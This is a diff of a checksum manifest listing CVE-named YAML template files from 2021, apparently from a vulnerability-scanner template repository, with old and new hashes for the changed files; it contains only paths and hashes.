-http/cves/2021/CVE-2021-28377.yaml:a14614a7091a6dae30ad0d7c77c00899100a0981 -http/cves/2021/CVE-2021-28419.yaml:81ea7bd96652f972ce9b5e1cfbd77f7d160ed9c6 +http/cves/2021/CVE-2021-28164.yaml:5dd4e3ae65a8c4ccc087ee45dc6c1039457fe244 +http/cves/2021/CVE-2021-28169.yaml:37da3586f6f8475da6f63596d5cbf578af370502 +http/cves/2021/CVE-2021-28377.yaml:0c0306f01abbec5444d522510bc897cea44339c7 +http/cves/2021/CVE-2021-28419.yaml:06dd2715d496bb243207a231a5c63d7b1de18d6f http/cves/2021/CVE-2021-28854.yaml:dd2007f9a927a86fa6765c9534a1259eb3c46f86 http/cves/2021/CVE-2021-28918.yaml:20422a3d75001b729c00e4a3c90e9ed033fb4349 -http/cves/2021/CVE-2021-28937.yaml:647e7448f2a3b3555298e351de5a7dba0d958a09 -http/cves/2021/CVE-2021-29006.yaml:3f6d3f064325f17fe590a38bbae392526e5ed5a9 -http/cves/2021/CVE-2021-29156.yaml:5814b1158661cceb1a262e7f34ff5040980e9d73 -http/cves/2021/CVE-2021-29200.yaml:e485da0092f467bdd1adb2cf7dfc544c61ac1f0f -http/cves/2021/CVE-2021-29203.yaml:b4b3c9702a7ba11de6bafd405b269b144634be84 +http/cves/2021/CVE-2021-28937.yaml:bd90f9666ffbbd6f1911cf7d3e92bcd7b10db395 +http/cves/2021/CVE-2021-29006.yaml:46596666b900962b362a68a1ae4665002fc8489f +http/cves/2021/CVE-2021-29156.yaml:dd426a2d85c02bdd6820151a503b813b623ffc6e +http/cves/2021/CVE-2021-29200.yaml:2eacb123c53c6291e6f98e85ade682001d2127aa +http/cves/2021/CVE-2021-29203.yaml:097c5d57566606d4908f10ef8f557c2dbadc1684 http/cves/2021/CVE-2021-29441.yaml:437a19e0d1b5d31dea8ff40a951b703eb77e4136 -http/cves/2021/CVE-2021-29442.yaml:b2fd9c5467a913f80015e20ab5c1ff6fb5ea1950 -http/cves/2021/CVE-2021-29484.yaml:63aa82a7a51ab985cdf379e46d6b1598ec9a0683 -http/cves/2021/CVE-2021-29490.yaml:3a04e9e1ab6011b372335b1e7a7db8adcba0d00c +http/cves/2021/CVE-2021-29442.yaml:818804dfe3d7008e6c615567ed874e1f3b45d2d9 +http/cves/2021/CVE-2021-29484.yaml:7be70cf51ae6211451faffc18a9dcca574c5a24b +http/cves/2021/CVE-2021-29490.yaml:da69b66fb55d67c32fb427d0c225e726f3ca7fbe http/cves/2021/CVE-2021-29505.yaml:499c17d9f306975010f29ed644e4c232907941b4 -http/cves/2021/CVE-2021-29622.yaml:4075eeaddf6bfc0e38ea03fdb817d651b72bf711 -http/cves/2021/CVE-2021-29625.yaml:f29c485158f863b71003a1d8b54b3564ccdf9baa -http/cves/2021/CVE-2021-3002.yaml:b17285115d6e7ca777078b433959aafc7fc49766 -http/cves/2021/CVE-2021-30049.yaml:10dfed32823f675d7a8200ad9f639d326269d9d9 -http/cves/2021/CVE-2021-30128.yaml:c2064c93ae1cfdae0666a78a041e01f454965dca -http/cves/2021/CVE-2021-30134.yaml:6365aa91075632c43c56867d35f0d5495d0aaa6a -http/cves/2021/CVE-2021-30151.yaml:a5823328a2e51b6e25209da97cfd262cd11028fb -http/cves/2021/CVE-2021-3017.yaml:e6968f807056416f2f6f95ce0b753c7da8f7bdf3 -http/cves/2021/CVE-2021-30175.yaml:3da6712428c20d2f6ed6992dc6c774347f8c6850 -http/cves/2021/CVE-2021-3019.yaml:919abc666f5c4da2d07307d5ad1a6afc76d8403b -http/cves/2021/CVE-2021-30213.yaml:17b564617db8472f9190ed3de84f2385dbcf5ad2 -http/cves/2021/CVE-2021-30461.yaml:24724b1de4aaf6be6836a99107b049804c1017b1 -http/cves/2021/CVE-2021-30497.yaml:558ffe9dd0dc5369a560ffaa5983f5ffc4ae0bbe -http/cves/2021/CVE-2021-3110.yaml:80f9e4876bf76ae9e6916913973ae364fe732628 -http/cves/2021/CVE-2021-31195.yaml:318357499b1e4df75f0af6df36aba00d2f1c9411 +http/cves/2021/CVE-2021-29622.yaml:fac9f650cecf2b0249ff5db89704d89ac1ad2de3 +http/cves/2021/CVE-2021-29625.yaml:65852bbaa7ef79ac96435c4b5a55762e6df9558a +http/cves/2021/CVE-2021-3002.yaml:689d379864c76a630eb3ad129fb379c2021a926e +http/cves/2021/CVE-2021-30049.yaml:fc44294f44537b7426855643a448c2a138a2bb5c +http/cves/2021/CVE-2021-30128.yaml:b119c7a5cd0558a5d6ed6379e72d9a6dbd66ec8a +http/cves/2021/CVE-2021-30134.yaml:dfca391ce0dc56cbf534854f4bbac3b95a451754 +http/cves/2021/CVE-2021-30151.yaml:648be73d0bdb77e56474e68dfed691f58b291e36 +http/cves/2021/CVE-2021-3017.yaml:804614220a942d8b22c7cfa4f2ec1d43b3b8b8d7 +http/cves/2021/CVE-2021-30175.yaml:42ecbdc2f4dcbdc81e94bcfd6d31af0c0f011c78 +http/cves/2021/CVE-2021-3019.yaml:f07c8e5cc5ec9b7ae1b7cb57a35a7cb17281bacf +http/cves/2021/CVE-2021-30213.yaml:d78b5aba3bec5186aac1eadbcab658a2ab1d4fdb +http/cves/2021/CVE-2021-30461.yaml:91ea30f242dac2f693091298b160762933c080b3 +http/cves/2021/CVE-2021-30497.yaml:475c233386c5ba0e18abcfdc0e304105c6a8a2e7 +http/cves/2021/CVE-2021-3110.yaml:70a3a1b4da525f3cc12c8e320828c1de7787d711 +http/cves/2021/CVE-2021-31195.yaml:4bd37744f62b3d1bd7b9a9fcab8c18d2f1f6e4ea http/cves/2021/CVE-2021-31249.yaml:514a2d8097e60e15ab5d5dea64714e8293db2b3a -http/cves/2021/CVE-2021-31250.yaml:609cc147261d689c2abfb6f60576bec2d1b390c1 +http/cves/2021/CVE-2021-31250.yaml:867864379eb75c9a81f7e05fb7b7919af58517e4 http/cves/2021/CVE-2021-3129.yaml:58cf44f43956214483492f7c4f1664bd05036422 -http/cves/2021/CVE-2021-31537.yaml:3557e0e6c8c4258523542676e9c54cc4a864d01f -http/cves/2021/CVE-2021-31581.yaml:89e09bf6b0e67ec62e8545a13524c1af524cbad9 -http/cves/2021/CVE-2021-31589.yaml:7f4a33c1d82dbb7a2077ff41bed406c37eb16e2c -http/cves/2021/CVE-2021-31602.yaml:50a07c3242e430b8e02640df76722583bc2129b5 -http/cves/2021/CVE-2021-31682.yaml:80f81046e36750f26a3c45ebf7ed8e1f2ac20061 -http/cves/2021/CVE-2021-31755.yaml:ef66cafb9c455883d62a8674c444e6b657794052 -http/cves/2021/CVE-2021-31805.yaml:ee69e2d4f237e0c6eba34f2eab26551732340203 +http/cves/2021/CVE-2021-31537.yaml:ef4891cdc66df98a86793a3189fb01e160c98d7e +http/cves/2021/CVE-2021-31581.yaml:e5c18e16322cbd210f5fe06933959260e2cf08fa +http/cves/2021/CVE-2021-31589.yaml:b4cbfd0f2f1068028e2d5e0d49ef01cabf0f5d4d +http/cves/2021/CVE-2021-31602.yaml:1f94619245a151b2328fd592c9d96be8186812d9 +http/cves/2021/CVE-2021-31682.yaml:f3b62f2169e6269939a64015733c3648afe5fa90 +http/cves/2021/CVE-2021-31755.yaml:abd8d7371154a95f163a1536f988b90e708600c3 +http/cves/2021/CVE-2021-31805.yaml:3e4cd0ea3477154f2935b058433b16e67ea7da8b http/cves/2021/CVE-2021-31856.yaml:02f2f826362c783a35fa70eee7772941eaddcde1 -http/cves/2021/CVE-2021-31862.yaml:688f0289637d1e40b8a70c6fb14d7b4ad60232fb +http/cves/2021/CVE-2021-31862.yaml:89473ea0b944e76fe6be8e9b83b2d2663ff6d8b3 http/cves/2021/CVE-2021-32030.yaml:c0a4636874282c087cf32c8e177c73dd9f771710 http/cves/2021/CVE-2021-32172.yaml:8fdebff02b3d16ee1e990072fd53e435b1e8dac7 -http/cves/2021/CVE-2021-3223.yaml:36219448b19905a79b4884f01b29465c01ef619a +http/cves/2021/CVE-2021-3223.yaml:e1896f30e0499ef12ccb5fc03b892c9c87f2444b http/cves/2021/CVE-2021-32305.yaml:70d9951aa4e2a64bd18be918d669dde6a9a18cf2 -http/cves/2021/CVE-2021-32618.yaml:5c9dccd91eba0c070f7db1399560ccdc8a307650 +http/cves/2021/CVE-2021-32618.yaml:4874c4ff111966f4a1cad76dc222b1cbd967d88a http/cves/2021/CVE-2021-32682.yaml:31e0b4b5fdcf1ff4fb51b0f653ecfbce0ec0d9d2 http/cves/2021/CVE-2021-32789.yaml:03bf6b93c36208174b66afb4a806a53868ed54de http/cves/2021/CVE-2021-32819.yaml:380a8078feba8f1bc4e50b118a121f74d6cf25f8 -http/cves/2021/CVE-2021-32820.yaml:57d867e0ffe0387cf8d39de537bc19f8de4a5ab4 -http/cves/2021/CVE-2021-32853.yaml:21fa7610aab9ab5f27e3e6c9e4546f7f6880d5d4 +http/cves/2021/CVE-2021-32820.yaml:b75870f452e12388c569089adbaafea642e0aad9 +http/cves/2021/CVE-2021-32853.yaml:8b24fa2ce857eaa46e5aaa1f51ff391f839370d0 http/cves/2021/CVE-2021-3293.yaml:36aba5cc9aad3ae4e19921a3f84cdd1db53ae512 -http/cves/2021/CVE-2021-3297.yaml:9d24a96563e4acab938b8f53508908f726e456ce -http/cves/2021/CVE-2021-33044.yaml:25f1d31729eb0d28735576ac71970f91a579f5e6 -http/cves/2021/CVE-2021-33221.yaml:fcf463a7a41b0beb75c543b35f6698c1703754c4 -http/cves/2021/CVE-2021-33357.yaml:cdb2be78509d3d61d0b585b0a4207af47cb45f89 +http/cves/2021/CVE-2021-3297.yaml:77ace535639edee109758e3bd19687248d82829a +http/cves/2021/CVE-2021-33044.yaml:f267244e663d85f45c06e5e6fa8f572c8777c177 +http/cves/2021/CVE-2021-33221.yaml:9c58ce321de4f629f5d1762a2e1832c46dcccca4 +http/cves/2021/CVE-2021-33357.yaml:24596aa2d592229a59bacaa77d7ec280fdf036ef http/cves/2021/CVE-2021-33544.yaml:fce70ffeea8d3bdb07f5f487869da319c7a95fa3 http/cves/2021/CVE-2021-33564.yaml:a82110635a2629a0c81dc6b2984959c690d0c393 -http/cves/2021/CVE-2021-33690.yaml:87e4d72e0fad030fd83158fd1cd59f03ee052899 -http/cves/2021/CVE-2021-3374.yaml:0a10b39966d1393de6d2c5d5ccc8f7556e4dd2e4 -http/cves/2021/CVE-2021-3377.yaml:bd5e20bb66fd84b14fbcd1dbf118056c01fa2c56 +http/cves/2021/CVE-2021-33690.yaml:444266a7432bb0b56c6148250e0bd5e043c7d4c0 +http/cves/2021/CVE-2021-3374.yaml:d519f7466444215eb8fa36b51b72e8589eaad100 +http/cves/2021/CVE-2021-3377.yaml:9bf0ad577fa9166abc78af4d61e6e441f41b2519 http/cves/2021/CVE-2021-3378.yaml:a842331f8c0924d398887c3ec42f8fbac970903c -http/cves/2021/CVE-2021-33807.yaml:a61fda186347244feb571f28a9ef0372dda5bcee -http/cves/2021/CVE-2021-33851.yaml:f2cced7480d09d4f3f70ebb9667a5cf0395c40bc -http/cves/2021/CVE-2021-33904.yaml:7c9ab65dea3207c5d4d7ec0f0389e54ddd83041e +http/cves/2021/CVE-2021-33807.yaml:d7504eb3a116bcc711e13dd11194491baad20ca6 +http/cves/2021/CVE-2021-33851.yaml:d37fb55018b8fb0d2a84a1be6c07984c49cf8c21 +http/cves/2021/CVE-2021-33904.yaml:89ef9a57ce230eaba15109352d5a2754f31d0a0c http/cves/2021/CVE-2021-34370.yaml:a6bb7f8f166cf8c32e0d5413eb96c76d3fb3f6d1 -http/cves/2021/CVE-2021-34429.yaml:72395ef74692d870bca3d7c36f10597ecf1399fd -http/cves/2021/CVE-2021-34473.yaml:a6fba055485ffd19a582007be3cd8ff1bbff72a8 +http/cves/2021/CVE-2021-34429.yaml:8a584bf70eb9bdfd8daec086e96871d74f66e397 +http/cves/2021/CVE-2021-34473.yaml:73ac890892773d6afb2a31fea09c8c245a393b2d http/cves/2021/CVE-2021-34621.yaml:56f9dc43ee199038f49466b0b480aa7a964ac31f -http/cves/2021/CVE-2021-34640.yaml:61caec8b6d0c93bdbe75e426edb560512c56fd42 -http/cves/2021/CVE-2021-34643.yaml:80ca06ba1c1cf0d691768d9f883c9e28fec4edc3 -http/cves/2021/CVE-2021-34805.yaml:225835eb377bfb001f9338527aaa371b464c7a8f -http/cves/2021/CVE-2021-35250.yaml:56665ee2ea1b6d9177011331cead60250b5c3ad2 -http/cves/2021/CVE-2021-35265.yaml:edea4e848e1cea0fc24c3d245a151bda41ddf95f +http/cves/2021/CVE-2021-34640.yaml:c4684c43b933c18e653b46096cbda6fb725fced4 +http/cves/2021/CVE-2021-34643.yaml:c4eafb5f2cac85929b4960a12274dafdc30fd58f +http/cves/2021/CVE-2021-34805.yaml:aaa2167c9c4e34633b7c9d8ba32e96031ce341d1 +http/cves/2021/CVE-2021-35250.yaml:289efeaa556b5e04135b24cec42fefac1a7dd4da +http/cves/2021/CVE-2021-35265.yaml:b139ff21ddc649a5f3b9315e156c543cfeeed592 http/cves/2021/CVE-2021-35323.yaml:d147477c5193b9fb927fdf34cf3903193413b232 -http/cves/2021/CVE-2021-35336.yaml:6caae867947908ef1442faf0b50f91f399626a27 +http/cves/2021/CVE-2021-35336.yaml:a73c5bd76374c5db032ec1b03a3a833dbad07feb http/cves/2021/CVE-2021-35380.yaml:166a86250742c082425c822f746a97c97e9db37c -http/cves/2021/CVE-2021-35395.yaml:4cc3ed2c5194767f8ca75ce92ba4dab526dc94c9 -http/cves/2021/CVE-2021-35464.yaml:e9e28056833f62649ffb18df6f4b85dbcc14c223 -http/cves/2021/CVE-2021-35488.yaml:dd54cb49aea94f5ef4450cfcbaa82faaa2b134d7 -http/cves/2021/CVE-2021-35587.yaml:d4afb690b5cf0918770a6ddfb4ab4bb2553c6775 -http/cves/2021/CVE-2021-3577.yaml:0a56135b1cbb7f3b10130898fd11a85f526751f4 -http/cves/2021/CVE-2021-36260.yaml:7ba20097cfe679697162daf4e4a38b512d0fba96 -http/cves/2021/CVE-2021-36356.yaml:11649c7f6aefe25455c99ea49cec69e162690899 -http/cves/2021/CVE-2021-36380.yaml:adf247b74181860c6c19fd249c8f064372c4ef46 -http/cves/2021/CVE-2021-36450.yaml:6fcb0b245765fb039a8203789dab679b428176a9 -http/cves/2021/CVE-2021-3654.yaml:a88d24822a0f499bfa14e006237babd366825c4d -http/cves/2021/CVE-2021-36580.yaml:edd21d1beb5fc1b3647b3f3dab0195e72f58b4b6 -http/cves/2021/CVE-2021-36748.yaml:fa9e34fc74625f7e72ea3230becaabb93eac54ff +http/cves/2021/CVE-2021-35395.yaml:d18dfdd20fc2124b6f6156bcc999c57407f34d33 +http/cves/2021/CVE-2021-35464.yaml:6efe7248948e30d881018d084229350824d1e3b5 +http/cves/2021/CVE-2021-35488.yaml:4dfcf3f693de2670eda1a5a3adc9f85a572eaee7 +http/cves/2021/CVE-2021-35587.yaml:79a2242ab3dc3488d90ba7787e73a2ed6827a81b +http/cves/2021/CVE-2021-3577.yaml:f363338587c0c4eb79c5eb65cb54b01f0e62ccee +http/cves/2021/CVE-2021-36260.yaml:64ff273b05ae0ed2d4a2f909ef25fef624192c72 +http/cves/2021/CVE-2021-36356.yaml:ff2b6d790262793cd6ad07b08632309c64ac0ddd +http/cves/2021/CVE-2021-36380.yaml:dc4250aaa3237110ffeb1b75dd8f00990ac7a4cd +http/cves/2021/CVE-2021-36450.yaml:969296d7e07a4431bb7eae6c5d6621144a217f9b +http/cves/2021/CVE-2021-3654.yaml:87e0613f4f6a62e23538b469f523b3e6357b1458 +http/cves/2021/CVE-2021-36580.yaml:967749bd57647c75bb0d380c9c31b82ed905b038 +http/cves/2021/CVE-2021-36748.yaml:113ef42346ebce2bd76538669dcdfeb52509d713 http/cves/2021/CVE-2021-36749.yaml:3b0a7b9a9d14edf603248b938e61d7db03f084a7 http/cves/2021/CVE-2021-36873.yaml:cbff75f79e65e669b04b3b174ef61d586109cc6b http/cves/2021/CVE-2021-37216.yaml:79f6fb2bedd55cef9c44cd8a90e800cbd1714802 -http/cves/2021/CVE-2021-37304.yaml:89e1a775a31a9c61d14b23d0f1bc0b11d8b8a812 -http/cves/2021/CVE-2021-37305.yaml:b1769dd81f876b2322c8ba43750029e933150eec -http/cves/2021/CVE-2021-37416.yaml:5ca48602ee0adc67ab7d08ce6b6afce5cb28e84e +http/cves/2021/CVE-2021-37304.yaml:04fc8faf0d2365b7f1cbfcfc76f79c1c0c9e89cb +http/cves/2021/CVE-2021-37305.yaml:1e87bb921d860939bc5cacdc7a7c7993a9846a9f +http/cves/2021/CVE-2021-37416.yaml:d0889caca645e0a65b5791c8fe1975ffdddd8e9b http/cves/2021/CVE-2021-37538.yaml:10b588b6c384ac1f6391bcca0f0cf5d2ecf3aca4 -http/cves/2021/CVE-2021-37573.yaml:5a4623024051f0460741bb0f43cf018eabe7083a -http/cves/2021/CVE-2021-37580.yaml:005d8b2e74cd0be9a1f0c4ce410c98d08a8dc351 -http/cves/2021/CVE-2021-37589.yaml:70ab465b5d1ae2126062e892ffbc91fcd81036a6 -http/cves/2021/CVE-2021-37704.yaml:addffcf9d763ea0a368d137d23172b5c89e16a02 -http/cves/2021/CVE-2021-37833.yaml:6c38bf5800c5fa8bf0ccbd4f8258b8a1258f465f +http/cves/2021/CVE-2021-37573.yaml:bedcd4e63e8593038e1536ae1ff0ba4400d98c74 +http/cves/2021/CVE-2021-37580.yaml:f5dc24043216b36560265de80278583728faf8b2 +http/cves/2021/CVE-2021-37589.yaml:d69d7cccc5a283cba577bf63d83b2d1943385f75 +http/cves/2021/CVE-2021-37704.yaml:6d7a10739f7c4d531b01d13b3cd734068f58fdfc +http/cves/2021/CVE-2021-37833.yaml:9147c87c1d8c7cbdc6c90e73f4537a2cfb0ffa08 http/cves/2021/CVE-2021-38314.yaml:e43ac750d1856a2d72b10c003a5f69fcb060db10 -http/cves/2021/CVE-2021-38540.yaml:7878fc4ef40a5157a72fea08d7e7d28879cd83e7 +http/cves/2021/CVE-2021-38540.yaml:40e60e5c143755bf34c45b134f71cca4a0165122 http/cves/2021/CVE-2021-38647.yaml:d12fa581ce2c5917cb43d5af2d8edc56a31d3808 -http/cves/2021/CVE-2021-38702.yaml:937dc8484bbe5c93d0e84e8768a83db1add4c353 -http/cves/2021/CVE-2021-38704.yaml:3862195081ee44163006fc67f25d5cbd56396391 +http/cves/2021/CVE-2021-38702.yaml:7cb9a26484056f0955a7a91dd5ec2c6fa524df75 +http/cves/2021/CVE-2021-38704.yaml:bd8424cd3f0a688aac11da80e595d3545d3aee9f http/cves/2021/CVE-2021-38751.yaml:f73039cf9ee89c0ed2f5823ea7932261ebffa038 http/cves/2021/CVE-2021-39141.yaml:658ae606eefaee8e5ed50c513aff80caa008aa2f http/cves/2021/CVE-2021-39144.yaml:df10799e1ee8eb495557350715a2105e62845151 http/cves/2021/CVE-2021-39146.yaml:9ef18404257cb1565c85ab67df499d1adaf5152c http/cves/2021/CVE-2021-39152.yaml:27f978b5960d9eb90e9113b832f0ecdf0f1d54ad -http/cves/2021/CVE-2021-39165.yaml:e6fc6f34e2e87016f6a199dfbcbc1083a9532dae -http/cves/2021/CVE-2021-39211.yaml:8c283388ab4cb374d75f66a73008acfa1ed34107 -http/cves/2021/CVE-2021-39226.yaml:e0e9268fe2647cd38c4e255c94f034996525c183 +http/cves/2021/CVE-2021-39165.yaml:41cb34053dcde697cdc2743a80c304656985e504 +http/cves/2021/CVE-2021-39211.yaml:ddf94e9cc0b050e3d6d330545946ad092c7ba314 +http/cves/2021/CVE-2021-39226.yaml:70ecb2383959f88ea9bfedaed49f76f5cf2a1475 http/cves/2021/CVE-2021-39312.yaml:eea2b37fd676c4075a9b388b8f27a51308c86f2e http/cves/2021/CVE-2021-39316.yaml:987c2e078d53725debd4637ce5c6d9f72914f683 -http/cves/2021/CVE-2021-39320.yaml:d55743bd0c30e3310dea7ffc7530dea784d1938f +http/cves/2021/CVE-2021-39320.yaml:002e6f6fcf6a88cd25bb3b423f9868e28ef80d59 http/cves/2021/CVE-2021-39322.yaml:6408a97278c6cf53fa277c226aa71b95f766fb41 http/cves/2021/CVE-2021-39327.yaml:4b9e392a8aed5ba3712bfa79673e89e403616964 http/cves/2021/CVE-2021-39350.yaml:bc1436fd7acd615ef4528971efa6a5066aa3b4d1 -http/cves/2021/CVE-2021-39433.yaml:beec72dfa9c2836d611a71dd565dcb142a72da31 -http/cves/2021/CVE-2021-39501.yaml:ec5ad1d64e6c1246ab273c38b912fcbddd7637af -http/cves/2021/CVE-2021-40149.yaml:1676310c0067f153ab7305bba1472380a767a0a8 -http/cves/2021/CVE-2021-40150.yaml:19dbd3ac074a19d46cf672e82952cce57dc7d871 -http/cves/2021/CVE-2021-40323.yaml:497d6b22e1eccc32f89e716d8290750b9e130abe -http/cves/2021/CVE-2021-40438.yaml:6e016c28d12e67a00a23bcf35b0cfb22888eb797 -http/cves/2021/CVE-2021-40539.yaml:eabff516d0834f61841b5f29e1bc4fbe2f6fca41 -http/cves/2021/CVE-2021-40542.yaml:d24460225cb566c0790fa0cf0293e9ccd121a84a -http/cves/2021/CVE-2021-40651.yaml:d0c2949c384e736bbc945a24017f05aa28d30d38 +http/cves/2021/CVE-2021-39433.yaml:9ebfc436d00bdfee4b944d1764beb52757dd085e +http/cves/2021/CVE-2021-39501.yaml:8e87f45189acbbe1c3d8f72b7c8d3de6d6e4cf1e +http/cves/2021/CVE-2021-40149.yaml:cf24971583916fc9df26152d3a6904e5d2256b62 +http/cves/2021/CVE-2021-40150.yaml:8d42c33df3f2a2212cb566144682e68211366684 +http/cves/2021/CVE-2021-40323.yaml:c887688f619ed428bfa00a8a3d1f560f50c4ee16 +http/cves/2021/CVE-2021-40438.yaml:c1b3337327ac449fa6493dfdb25cfced55cf4ac3 +http/cves/2021/CVE-2021-40539.yaml:51764f7c50c08d72e7f78823fe516f626c7eadb7 +http/cves/2021/CVE-2021-40542.yaml:3901563dc3bacc37311b557a68707c81831864d2 +http/cves/2021/CVE-2021-40651.yaml:caa1bf9adb2e2ad89e7a8c7920dd319e7752067c http/cves/2021/CVE-2021-40661.yaml:f780fd916ac3f8d1c70ea104c4cbf11905176041 -http/cves/2021/CVE-2021-40822.yaml:97de64ee2998793338d9184a47c51605cd2f6437 +http/cves/2021/CVE-2021-40822.yaml:deb901fe053f0c194f631c58770ce4386f819542 http/cves/2021/CVE-2021-40856.yaml:4aadf3d80dd73b612020a8d1ca20c5111201a957 http/cves/2021/CVE-2021-40859.yaml:a8a6ab85fce3e1aab3d083ea9f6e20657d55a958 -http/cves/2021/CVE-2021-40868.yaml:a56bcaccdc7226a4b01f50507ef4a5b829cb5f02 -http/cves/2021/CVE-2021-40870.yaml:11ada269b8beb5ea7aa3d62a68dbeedfd7a574f1 -http/cves/2021/CVE-2021-40875.yaml:f1df098a240419566a0da1c521e7d16b038af00e -http/cves/2021/CVE-2021-40908.yaml:ce2725650a88ab95a4d556943be0b731c227b9a1 +http/cves/2021/CVE-2021-40868.yaml:c5c30fe3252bae32bf85e6b63c764d1c219d3cc7 +http/cves/2021/CVE-2021-40870.yaml:46d3de8e6493f2e904332956193f0421aff425a3 +http/cves/2021/CVE-2021-40875.yaml:fb4c6615ea5e8751f122107366e3d08eec8d236b +http/cves/2021/CVE-2021-40908.yaml:78115ff3db4e03b21cb56370d0c01957d7539d8f http/cves/2021/CVE-2021-40960.yaml:0da341f855c1b922e90c84d04bd50f6b10c66eb9 -http/cves/2021/CVE-2021-40968.yaml:895232a56db6a7a97be40d4df4ca9a077580b7af -http/cves/2021/CVE-2021-40969.yaml:2c9bc3c0fc3481d3acd05f7dca5c2bdcab22680e -http/cves/2021/CVE-2021-40970.yaml:93c2c81ee58923603e9e76719ed3f265b354a6d9 -http/cves/2021/CVE-2021-40971.yaml:82479de07114ce2af5d9d054af5772e24fab4728 -http/cves/2021/CVE-2021-40972.yaml:5b1033503e68799ee48c7db99fe18022bbf90090 -http/cves/2021/CVE-2021-40973.yaml:cfebb17252bd68b2249cb86a685eee07c23f5c5b -http/cves/2021/CVE-2021-40978.yaml:69bfcf37ede0809cb9194d5537dac75694206fcc -http/cves/2021/CVE-2021-41174.yaml:f477462b5dd4cbb876d98c9b75e58aa99e70bbce -http/cves/2021/CVE-2021-41192.yaml:4cab8c9850131699d5522c858a61c02f55adfa07 +http/cves/2021/CVE-2021-40968.yaml:964f199af1bfb73b8aad3d1676fe863fdb72fa9f +http/cves/2021/CVE-2021-40969.yaml:5fa95bad2d845bd4e18097a5cbc2028480eb4f32 +http/cves/2021/CVE-2021-40970.yaml:7db56ae74c9d22d549d669e4621b3a5536ecdfc1 +http/cves/2021/CVE-2021-40971.yaml:d7c0f8712fe5a4d176bb466698ae0d0598458c3e +http/cves/2021/CVE-2021-40972.yaml:427e1fbcf2f2ab843437094217a83a741e972dd0 +http/cves/2021/CVE-2021-40973.yaml:d78c81f374b77cb9e1c791bddd878807aa4045a9 +http/cves/2021/CVE-2021-40978.yaml:a8c962c57edc1d0760271c053d5cae56c23ba5e9 +http/cves/2021/CVE-2021-41174.yaml:fa6d70e713a087560074a1967e8b7dce96fa38cd +http/cves/2021/CVE-2021-41192.yaml:079fec1025e916731f1ec243fa5873ba272fa007 http/cves/2021/CVE-2021-41266.yaml:8d081cc6e83f9e2b3397e60a81a16ec1a281b930 -http/cves/2021/CVE-2021-41277.yaml:1af9e26de8fd408f138f1ae8ea29f2f3772eb6bd -http/cves/2021/CVE-2021-41282.yaml:08dfe9f24d6edcba12decc8b0f52a30d4d111abc -http/cves/2021/CVE-2021-41291.yaml:8dfa8bb00874c95e87205cf611780c323317bbc1 -http/cves/2021/CVE-2021-41293.yaml:45713072befbaf77ed6f28d8582ce10f5d825984 -http/cves/2021/CVE-2021-41349.yaml:094ece33db1ffd227f413f689ec74783b821fb78 +http/cves/2021/CVE-2021-41277.yaml:5ef224cdb4e37d9ecb3237a8cca89056899ed757 +http/cves/2021/CVE-2021-41282.yaml:b050368c178e358c9aebc24e38129a370d3f64d5 +http/cves/2021/CVE-2021-41291.yaml:984169427a50e27703f9eb32406ce40e1a36a4d5 +http/cves/2021/CVE-2021-41293.yaml:126b34d1fa897ebca33a0331d478a68544c96235 +http/cves/2021/CVE-2021-41349.yaml:861b0593eb402420d60bd5676552a2343cadd097 http/cves/2021/CVE-2021-41381.yaml:0a52047e8dde8f010728956b9e9d71088ddb87e8 -http/cves/2021/CVE-2021-41432.yaml:09b5dddb286ad439bc6a693c958d166f983b0ae5 +http/cves/2021/CVE-2021-41432.yaml:8ccccfa69a596c41f1df5be177a85f0b73ce8098 http/cves/2021/CVE-2021-41460.yaml:ae7e6179c5d6ca32450f81c03fcaf39d34b8221d -http/cves/2021/CVE-2021-41467.yaml:5e6337c03bac6733a42d4bc9b8d0dc36f50178e8 +http/cves/2021/CVE-2021-41467.yaml:51e9bf3d8ad65e48d1dba90b473d125995f54de3 http/cves/2021/CVE-2021-41569.yaml:2c2ba97cff9b68cc6c448a1fb49c4e190460d10d http/cves/2021/CVE-2021-41648.yaml:60e9dcc0e99f1df5353d44d464fb0b7cd0593caf -http/cves/2021/CVE-2021-41649.yaml:4bc0c7180842cade90762bf71eb0b3d96c96f590 +http/cves/2021/CVE-2021-41649.yaml:acc19e8708a6a4f3a502515195f6be004882f0e9 http/cves/2021/CVE-2021-41653.yaml:3578aadef6ceea1b69fa0a6bf5a05a51afe45504 http/cves/2021/CVE-2021-41691.yaml:d5c6275154110bdc9d78c09dadce004287917630 -http/cves/2021/CVE-2021-41749.yaml:8ebb8ac082d62b69b2b0512fa21901b5bb5f9387 +http/cves/2021/CVE-2021-41749.yaml:90d4f9e6fe6c5fbef7f9ee2153fb841b4451c540 http/cves/2021/CVE-2021-41773.yaml:90279d433d0c1af880ab2755946704d9729786bc http/cves/2021/CVE-2021-41826.yaml:a8141bbbbc83b841143f8ac04fbbf369f77d54c6 http/cves/2021/CVE-2021-41878.yaml:8e2605b78d43422b23f6e5e263977290e45e1ea9 -http/cves/2021/CVE-2021-4191.yaml:7b6890c08e0ea17ae011f8c97340db77e0a90639 -http/cves/2021/CVE-2021-41951.yaml:0374f8f953e5e675bc35f3f9b4ed514822a56f2b -http/cves/2021/CVE-2021-42013.yaml:a5fe8608cfd03f9f39c5cb3c615383f46af38d3b -http/cves/2021/CVE-2021-42063.yaml:fb21c370ffa8b569b5f3c0a9c5877a0024953afb +http/cves/2021/CVE-2021-4191.yaml:f3213003b286620011e5b8952a3c7539327ab361 +http/cves/2021/CVE-2021-41951.yaml:4bc3fdf1d171b6203536f93edcb69ad6d6497afc +http/cves/2021/CVE-2021-42013.yaml:fa81be16aa732c0728938fe290380a3ade44bfea +http/cves/2021/CVE-2021-42063.yaml:e6959f1dd464f4b98421592102d37f9eb9e1c736 http/cves/2021/CVE-2021-42071.yaml:748f0615ef4142655d78ba5d86dd052c447ad312 http/cves/2021/CVE-2021-42192.yaml:b812ebb74367408339a3d62bab21f8e1d2ae996a -http/cves/2021/CVE-2021-42237.yaml:65d95d359203e835304459159321ad52af420af8 +http/cves/2021/CVE-2021-42237.yaml:cbac075bfbf5969fdf545d8ff4967c0214af1e51 http/cves/2021/CVE-2021-42258.yaml:ad213c4af31afd36d0ff95b7e52260947aa2013d http/cves/2021/CVE-2021-42551.yaml:423c75207a7156988c7470f235754d787fc81dd5 -http/cves/2021/CVE-2021-42565.yaml:b7050a52d1b9adc6589b30134c98ca7586b255fb -http/cves/2021/CVE-2021-42566.yaml:c8ae361a4557972af3ababd668677d47cbde2b99 -http/cves/2021/CVE-2021-42567.yaml:a80ad6215969060c0d6bc11412a6d1528c80ee57 -http/cves/2021/CVE-2021-42627.yaml:118a460e44bf332539c3bffe407752be1d66e97b 